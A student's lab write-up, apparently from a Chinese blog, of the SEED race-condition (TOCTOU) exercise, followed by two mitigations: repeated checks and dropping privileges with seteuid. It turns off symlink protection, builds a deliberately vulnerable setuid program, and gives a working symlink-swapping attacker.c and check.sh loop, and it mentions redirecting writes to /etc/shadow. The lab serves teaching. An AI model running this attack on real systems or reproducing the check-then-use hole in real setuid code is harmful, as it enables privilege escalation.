竞态条件漏洞实验

一、实验简介

        竞态条件是指多个线程同时访问或者操作同一块数据,运行的结果依赖于不同线程访问数据的顺序。如果一个拥有root权限的程序存在竞态条件漏洞的话,攻击者可以通过运行一个平行线程与漏洞程序竞争,以此改变该程序的行为。

        在本实验中学生将利用竞态条件漏洞获得root权限。除了攻击之外,学生还将学习如何制定保护方案抵御该类攻击。

        系统用户名seed,密码dees。

        登录用户方法为在命令行输入“su”,随后输入密码即可。

        由于本实验环境开启了针对竞态条件攻击的保护,所以需要先关掉保护。该选项意味着全域可写sticky位开启的文件夹是不能作为链接目标所在文件夹的。(如果发现不能修改权限,请关掉当前的实验环境,启动新环境来进行此次实验。本次实验的环境可能和您之前保存的环境不同。为保证实验的多样性,实验楼为不同的实验配备不同的实验环境。)

sudo su
echo 0 > /proc/sys/fs/protected_symlinks
exit

        新建工作目录并进入目录:

cd ~
mkdir seed
cd /home/shiyanlou/seed

        在该目录下新建vulp.c文件: 

$ sudo vi vulp.c

        并输入代码:

/* vulp.c */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        for(i=0; i < DELAY; i++){
            int a = i^2;
        }
        fp = fopen(fn, "a+");
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");
}

实验一、利用竞态条件漏洞

        在这个vulp.c文件中有一个竞态条件漏洞。由于检查(access)与访问(fopen)之间存在时间间隙,所以检查与访问的就有可能不是同一个文件,即使它们的名字相同。如果一个恶意攻击者可以创建一个 /tmp/XYZ/ 链接指向 /etc/shadow,输入的字符串就会追加到shadow文件中去。

        编译vulp.c文件,并将其设为SET-UID文件

sudo gcc vulp.c -o vulp
sudo chmod u+s vulp

        新建目标文件root_file:

$ sudo touch root_file 
$ sudo chmod g+w root_file

        新建append_text文件,并输入你想要在root_file里加入的任意内容,这里加入的内容是“hello shiyanlou”,命令及root_file内容如下:

$ vi append_text

 

         新建助攻文件 tmp_file:

$ touch tmp_file

         具体操作过程如下图所示:

         这样攻击条件就都具备了,这步之后都以普通用户的身份进行攻击。

         创建检查时间戳的脚本check.sh,并将运行vulp的命令加入其中。check.sh代码如下:

#!/bin/sh
#注意`不是单引号
old=`ls -l /home/shiyanlou/seed/root_file`
new=`ls -l /home/shiyanlou/seed/root_file`
while [ "$old" = "$new" ]
do
    ./vulp < append_text
    new=`ls -l /home/shiyanlou/seed/root_file`
done
echo "STOP... The file has been changed"

        给脚本运行权限:

$ sudo chmod u+x check.sh

         创建代码attacker.c,代码如下:

int main()
{
    while(1){
        system("ln -sf /home/shiyanlou/seed/tmp_file /tmp/XYZ");
        system("ln -sf /home/shiyanlou/seed/root_file /tmp/XYZ");
    }
    return 0;
}

        编译attacker.c:

$ gcc attacker.c -o attacker

  具体操作过程如下图所示(此时文件夹目录的情况用命令“ls -l”查看):

        点击 File-> Open Tab 在终端里新建标签页,在原来的终端先运行 attacker(命令为“./attacker”) 再在新建的终端运行check.sh(命令为“./check.sh”)

        运行界面如下图所示:

实验二、保护机制A:重复

        想要避免竞态条件的发生并不轻松,因为先检查再访问这个模式在很多程序中都是需要的。比起想办法移除漏洞,换个思路,我们可以增加更多的竞态条件,这样就能减小攻击者攻击成功的概率了。该机制的基础思想是重复access和fopen函数的次数。

        请使用这个策略修改漏洞程序,重复你的攻击。

        修改 vulp.c 代码如下:

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000

int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
    if(!access(fn, W_OK)){
        if(!access(fn, W_OK)){
            /*嵌套n层*/
            fp = fopen(fn, "a+");
            fwrite("\n", sizeof(char), 1, fp);
            fwrite(buffer, sizeof(char), strlen(buffer), fp);
            fclose(fp);
        }
        else printf("No permission \n");
    }
    else printf("No permission \n");
}

        运行结果如下图:

 实验三、保护机制B:最小权限原则

         该程序的根本问题就在于它违反了最小权限原则,程序员认识到运行这个程序的用户可能权利过大,所以引入access函数进行限制,但也同时引入了竞态条件的隐患。

        更好的方法是使用setuid系统调用暂时禁止root权限,当需要时再恢复。请以此法修复漏洞,再重复之前的攻击,观察结果并解释。

        代码如下:

#include <stdio.h>
#include <unistd.h>
#define DELAY 10000
    
int main()
{
    char * fn = "/tmp/XYZ";
    char buffer[60];
    FILE *fp;
    long int i;
    /* get user input */
    scanf("%50s", buffer );
        
    uid_t euid = geteuid(); 
    seteuid(getuid());
        
    for (i=0; i < DELAY; i++){
            int a = i^2;
    }
        
    if (fp = fopen(fn, "a+")){
        fwrite("\n", sizeof(char), 1, fp);
        fwrite(buffer, sizeof(char), strlen(buffer), fp);
        fclose(fp);
    }
    else printf("No permission \n");
        
    seteuid(euid);
}

        运行结果如下:

实验总结

        值得注意的是,在实验中,我最初在root_file中输入的是“hello shiyanlou 20212818”,但是最后执行出来的结果是只显示“hello”,通过查阅资料发现,函数scanf遇到空格时会自动结束。

        scanf函数在接收字符串时,遇到空格或回车就认为前面的输入已经完成且有效!

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值